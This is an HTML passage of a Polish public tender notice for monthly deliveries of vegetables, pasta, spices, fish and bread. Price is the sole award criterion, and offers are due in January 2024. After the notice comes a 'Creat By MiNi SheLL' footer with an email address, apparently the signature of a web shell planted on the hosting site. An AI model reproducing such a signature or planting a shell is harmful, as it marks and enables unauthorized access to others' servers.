Główny kod CPV: <span class="normal">15300000-1 - Owoce, warzywa i podobne produkty</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami i ich wagami:<br/><br/>Nazwa kryterium: cena za wykonanie danej części zamówienia	<br/>Waga100 %<br/><br/>Komisja przetargowa dokona oceny ofert w oparciu o kryterium zawarte w SWZ, przyznając każdej ofercie od 0 do 100 pkt.<br/>Oferta z najniższą ceną otrzyma 100 pkt, a pozostałe oferty otrzymają ilość punktów wyliczoną wg poniższej formuły:<br/> Cmin<br/> Yn = __________ x 100 pkt.<br/> Cn<br/>Gdzie:<br/>Yn - ilość punktów przyznanych ocenianej ofercie,<br/>Cmin	- najniższa cena ofertowa zaoferowana w ważnej ofercie za wykonanie danej części zamówienia,<br/>Cn - cena ofertowa ocenianej oferty za wykonanie danej części zamówienia</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest dostawa warzyw i przetworów warzywnych. Przewidywane zapotrzebowanie miesięczne na ww. artykuły wynosi:<br/>1	ziemniaki	750	kg<br/>2	marchew	22	kg<br/>3	pietruszka 13	kg<br/>4	por	27	szt<br/>5	pieczarki	16	kg<br/>6	pomidory	7	kg<br/>7	ogórki zielone	10	kg<br/>8	koper	26	p<br/>9	natka pietruszki	16	p<br/>10	cebula 10	kg<br/>11	cebula czerwona	2	kg<br/>12	kapusta pekińska	13	kg<br/>13	kapusta biała	2	kg<br/>14	kapusta kwaszona	29	kg<br/>15	seler	11	kg<br/>16	sałata zwykła	15	szt.<br/>17	sałata lodowa	10	szt.<br/>18	rzodkiewka	7	p<br/>19	kapusta czerwona	5	kg<br/>20	ogórki kwaszone	15	kg.<br/>21	kapusta włoska	1	szt.<br/>22	burak czerwony	14	kg<br/>23	brokuł duży 1	szt<br/>24	szczypiorek	8	p<br/>25	papryka czerwona	1	kg<br/>26	papryka żółta	1	<br/>27	czosnek	4	szt.<br/>28	pomidory koktajlowe cherry 250g	8	szt<br/>29	kalafior mrożony 450 g 19	szt.<br/>30	szpinak mrożony 450g 1	szt.<br/>31	fasola szparagowa mrożona 450g	14	szt.<br/>32	mieszanka 7-mio sładnikowa 450g	10	szt<br/>33	marcheweczki mini mrożone 450g 10	szt.<br/>34	brokuł mrożony 450g	6	szt<br/>35	groszek zielony mrożony - 450 g	1	szt.<br/>36	barszcz ukraiński mrożony opakowanie 400g	3	szt.<br/>37	marchewka z groszkiem mrożona 450g 10	szt<br/>38	groch suchy łuskany połówki 400g 8	szt<br/>39	fasola biała drobna 500g 2	szt<br/>40	koncentrat pomidorowy 30% 190g 44	szt.<br/>41	chrzan biały w słoiku 200g 2	szt.<br/>42	ogórki konserwowe 0,92 l 16	szt<br/>43	przecier szczawiowy siekany w słoiku 200g 18	szt.<br/>44	kukurydza w puszce 400g 4	szt<br/>45	groszek zielony w puszce 400g 6	szt<br/>46	soczewica czerwona 350g 1	kg<br/>47	sałatka szwedzka 360g 8	szt </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15300000-1 - Owoce, warzywa i podobne produkty</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami i ich wagami:<br/><br/>Nazwa kryterium: cena za wykonanie danej części zamówienia	<br/>Waga100 %<br/><br/>Komisja przetargowa dokona oceny ofert w oparciu o kryterium zawarte w SWZ, przyznając każdej ofercie od 0 do 100 pkt.<br/>Oferta z najniższą ceną otrzyma 100 pkt, a pozostałe oferty otrzymają ilość punktów wyliczoną wg poniższej formuły:<br/> Cmin<br/> Yn = __________ x 100 pkt.<br/> Cn<br/>Gdzie:<br/>Yn - ilość punktów przyznanych ocenianej ofercie,<br/>Cmin	- najniższa cena ofertowa zaoferowana w ważnej ofercie za wykonanie danej części zamówienia,<br/>Cn - cena ofertowa ocenianej oferty za wykonanie danej części zamówienia</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest dostawa przypraw, makaronów, mąki i kasz. Przewidywane zapotrzebowanie miesięczne na ww. artykuły wynosi:<br/>1	mąka typ 480	23	kg<br/>2	mąka pszenna typ 500 10	kg<br/>3	mąka ziemniaczana 1 kg	1	kg<br/>4	ciasto francuskie 5	szt.<br/>5	makaron świderki 400g	105	szt.<br/>6	makaron rosołowy 400g 52	szt.<br/>7	makaron krajanka 400g	51	szt.<br/>8	makaron pełnoziarnisty świderki 400g 8	szt.<br/>9	makaron spaghetti 400g 21	szt.<br/>10	makaron pióra 400g 6	szt<br/>11	makaron kokardki mini 400g 18	szt<br/>12	makaron gwiazdki 250g 12	szt<br/>13	makaron wstążka średnia 500g	11	szt.<br/>14	ryż biały w saszetkach 400g 22	szt.<br/>15	ryż biały 1kg 16	szt.<br/>16	kasza manna błyskawiczna 400g 1	kg<br/>17	kasza jęczmienna 400g 17	szt<br/>18	kasza gryczana jasna w saszetkach 400g	4	szt.<br/>19	kasza bulgur w saszetkach 400g 8	szt<br/>20	kasza kus-kus 400 g 4	szt<br/>21	płatki owsiane błyskawiczne 400g 3	szt<br/>22	cukier	88	kg<br/>23	cukier waniliowy 16g 19	szt.<br/>24	sól	3	kg<br/>25	sól alpejska	9	kg<br/>26	kwasek cytrynowy 50g 9	szt.<br/>27	liść laurowy opakowanie 20g	9	szt.<br/>28	keczup łagodny w tubce o minimalnej zawartości pomidorów 160g/100g opakowania o pojemnośco 480g	4	szt.<br/>29	przyprawa warzywna do potraw bez glutaminianu sodu 200g 58	szt<br/>30	zupa pieczarkowa w proszku 45g 12	szt<br/>31	barszcz biały w proszku 65g 39	szt.<br/>32	majeranek 20g 13	szt.<br/>33	papryka słodka mielona 20g 9	szt.<br/>34	pieprz mielony 20g 16	szt.<br/>35	kurkuma 20g 2	szt.<br/>36	tymianek 10g 2	szt<br/>37	zioła prowansalskie 10g 4	szt.<br/>38	rozmaryn 15g 1	szt.<br/>39	gałka muszkatułowa mielona 15 g 1	szt.<br/>40	oregano 10g 1	szt.<br/>41	bazylia 10g 1	szt.<br/>42	ziele angielskie 20g 4	szt.<br/>43	słonecznik łuskany 100g	1	szt.<br/>44	bulion warzywny 120g	1	szt.<br/>45	płatki kukurydziane z witaminami i żelazem 600g 5	szt<br/>46	jajka klasa A, rozmiar L, waga 50-60g	480	szt.<br/>47	smalec wieprzowy 200g	9	szt<br/>48	olej rzepakowy, rafinowany 1 l	55	szt.<br/>49	oliwa z oliwek 0,5 l 1	szt<br/>50	majonez 620g 7	szt.<br/>51	Ocet spirytusowy 0,5 l 10%	1	szt<br/>52	Żurek zakwas 0,5 litra	3	szt.<br/>53	cynamon 15g 1	szt.<br/>54	pieprz w ziarnach 20g	11	szt.<br/>55	budyń waniliowy i śmietankowy 64g 16	szt<br/>56	Kisiel (wiśniowy, truskawkowy, malinowy, agrestowy, cytrynowy, pomarańczowy) 38 g 16	szt<br/>57	galaretka 75 g (wiśniowa, truskawkowa, malinowa, agrestowa, cytrynowa, pomarańczowa)	43	szt<br/>58	herbata ekspresowa 100 torebek 2	szt<br/>59	herbata ekspresowa owocowa 20 torebek 8	szt.<br/>60	herbata granulowana 90g 5	szt.<br/>61	mięta w saszetkach 30g 10	szt.<br/>62	kawa zbożowa inka 150g 4	szt<br/>63	kakao granulowane 350g 7	szt<br/>64	musztarda sarepska 280g 1	szt<br/>65	musztarda francuska 280g 1	szt.<br/>66	miód pszczeli wielokwiatowy prawdziwy, opakowanie o pojemności 370g	9	szt.<br/>67	sos spaghetti 500 g 30	szt.<br/>68	sos sałatkowy 9 g 5	szt.<br/>69	koncentrat buraczany 300 g 2	szt.<br/>70	sos grzybowy 40 g 8	szt.<br/>71	sos pieczarkowy 35 g 3	szt.<br/>72	sos słodko-kwaśny 500 g 80	szt.<br/>73	fix spaghetti 4 sery z brokułami 48 g 5	szt.<br/>74	krem czekoladowy 350g	4	szt<br/>75	zacierki babuni 250g 4	szt.<br/>76	woda niegazowana 1,5 l 121	szt </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15800000-6 - Różne produkty spożywcze</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami i ich wagami:<br/><br/>Nazwa kryterium: cena za wykonanie danej części zamówienia	<br/>Waga 100 %<br/><br/>Komisja przetargowa dokona oceny ofert w oparciu o kryterium zawarte w SWZ, przyznając każdej ofercie od 0 do 100 pkt.<br/>Oferta z najniższą ceną otrzyma 100 pkt, a pozostałe oferty otrzymają ilość punktów wyliczoną wg poniższej formuły:<br/> Cmin<br/> Yn = __________ x 100 pkt.<br/> Cn<br/>Gdzie:<br/>Yn - ilość punktów przyznanych ocenianej ofercie,<br/>Cmin	- najniższa cena ofertowa zaoferowana w ważnej ofercie za wykonanie danej części zamówienia,<br/>Cn - cena ofertowa ocenianej oferty za wykonanie danej części zamówienia</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest dostawa ryb.<br/>Przewidywane zapotrzebowanie miesięczne na ww. artykuł wynosi:<br/>1	ryba mrożona - filet z dorsza b/s SHP 230-280 10-20% glazury	25	kg<br/>2	ryba mrożona - filet z miruny ze skórą, SHP 170-227 40	kg<br/>3	makrela wędzona klasa I	1	kg<br/>4	tuńczyk - puszka 170g, w sosie własnym, kawałki, zawartość ryby w opakowaniu min. 70%	3	szt </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15200000-0 - Ryby przetworzone i konserwowane</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami i ich wagami:<br/><br/>Nazwa kryterium: cena za wykonanie danej części zamówienia	<br/>Waga100 %<br/><br/>Komisja przetargowa dokona oceny ofert w oparciu o kryterium zawarte w SWZ, przyznając każdej ofercie od 0 do 100 pkt.<br/>Oferta z najniższą ceną otrzyma 100 pkt, a pozostałe oferty otrzymają ilość punktów wyliczoną wg poniższej formuły:<br/> Cmin<br/> Yn = __________ x 100 pkt.<br/> Cn<br/>Gdzie:<br/>Yn - ilość punktów przyznanych ocenianej ofercie,<br/>Cmin	- najniższa cena ofertowa zaoferowana w ważnej ofercie za wykonanie danej części zamówienia,<br/>Cn - cena ofertowa ocenianej oferty za wykonanie danej części zamówienia</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 7</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest dostawa pieczywa.<br/>Przewidywane zapotrzebowanie miesięczne na ww. artykuł wynosi:<br/>1	chleb pełnoziarnisty krojony 0,55 kg	6	szt<br/>2	chleb pszenny zwykły krojony 0,60 kg 120	szt<br/>3	bułka grahamka 0,06 kg	40	szt.<br/>4	bułka poznańska duża 0,09 kg	45	szt.<br/>5	bułka kajzerka 0,05 kg	120	szt.<br/>6	bułka tarta 0,5 kg	28	szt.<br/>7	bułka słodka z kruszonką 0,15 kg	30	szt.<br/>8	bułka słodka z budyniem 0,08 kg	25	szt.<br/>9	rogale z jabłkiem 0,08 kg	25	szt<br/>10	bułeczki mleczne 400g 16	szt<br/>11	pączki 0,08 kg	1	szt<br/>12	placek drożdżowy mała foremka 0,3 kg	8	szt<br/>13	chałka drożdżowa 0,30 kg	16	szt </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15810000-9 - Pieczywo, świeże wyroby piekarskie i ciastkarskie</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami i ich wagami:<br/><br/>Nazwa kryterium: cena za wykonanie danej części zamówienia	<br/>Waga100 %<br/><br/>Komisja przetargowa dokona oceny ofert w oparciu o kryterium zawarte w SWZ, przyznając każdej ofercie od 0 do 100 pkt.<br/>Oferta z najniższą ceną otrzyma 100 pkt, a pozostałe oferty otrzymają ilość punktów wyliczoną wg poniższej formuły:<br/> Cmin<br/> Yn = __________ x 100 pkt.<br/> Cn<br/>Gdzie:<br/>Yn - ilość punktów przyznanych ocenianej ofercie,<br/>Cmin	- najniższa cena ofertowa zaoferowana w ważnej ofercie za wykonanie danej części zamówienia,<br/>Cn - cena ofertowa ocenianej oferty za wykonanie danej części zamówienia</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający nie wymaga złożenia podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczenia</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Inne dokumenty dołączane do oferty:<br/>1) Pełnomocnictwo osoby lub osób podpisujących ofertę - jeżeli uprawnienie do podpisu nie wynika bezpośrednio z załączonych dokumentów.<br/>2) W przypadku złożenia oferty wspólnej – pełnomocnictwo udzielone liderowi.<br/>3) Zobowiązanie podmiotu udostępniającego zasoby – Załącznik Nr 3 lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów. /jeżeli dotyczy/<br/>4) Oświadczenie z art. 117 ust. 4 Pzp - Wykonawcy wspólnie ubiegającego się o udzielenie<br/>zamówienia – Załącznik Nr 4./jeżeli dotyczy/<br/>5) Kalkulacja cenowa – załącznik nr 7. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Oferta wspólna:<br/>1) W przypadku złożenia oferty wspólnej Wykonawcy ustanawiają pełnomocnika <br/>do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania <br/>w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>2) Oferta wspólna musi spełniać wymagania:<br/>a) oświadczenie, o którym mowa w pkt 1 ppkt 1 składa:<br/>- każdy z wykonawców wspólnie ubiegających się o udzielenie zamówienia w zakresie, <br/>w jakim każdy z wykonawców wykazuje spełnienie warunków udziału w postępowaniu<br/>lub<br/>- pełnomocnik (umocowany do składania oświadczeń wiedzy) w imieniu każdego <br/>z wykonawców osobno.<br/>b) oświadczenie, o którym mowa w pkt 1 ppkt 2 składa:<br/>- każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia (na oddzielnym formularzu)<br/>lub<br/>- pełnomocnik (umocowany do składania oświadczeń wiedzy) w imieniu każdego <br/>z wykonawców osobno. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Wszelkie zmiany i uzupełnienia treści niniejszej umowy mogą być dokonane za zgodą obu stron wyrażoną na piśmie pod rygorem nieważności.<br/>2. Zamawiający dopuszcza możliwość dokonania w umowie następujących zmian:<br/>2.1.zmiana gramatury dostarczanych produktów w przypadku wprowadzenia przez producenta innej gramatury niż określona w ofercie Wykonawcy,<br/>2.2. zmiana asortymentu w przypadku wstrzymania, zaprzestania produkcji, wycofania z rynku lub zmiany marki, z zastrzeżeniem, iż oferowany zamiennik musi odpowiadać parametrom co najmniej takim jak oferowany produkt, z gwarancję zachowania oferowanej ceny,<br/>2.3. zmiana cen produktów w przypadku, gdy z powodu istotnej zmiany ceny nieprzewidzianej przy zawarciu umowy, spełnienie przedmiotu umowy groziłoby jednej ze stron rażącą stratą,<br/>2.4. zmiana ilości w poszczególnych grupach asortymentowych artykułów wymienionych <br/>w załączniku nr 1do umowy z zachowaniem cen jednostkowych, <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-01-24 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę w postępowaniu za pomocą Platformy e-Zamówienia dostępniej pod adresem: https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-01-24 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-02-22</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com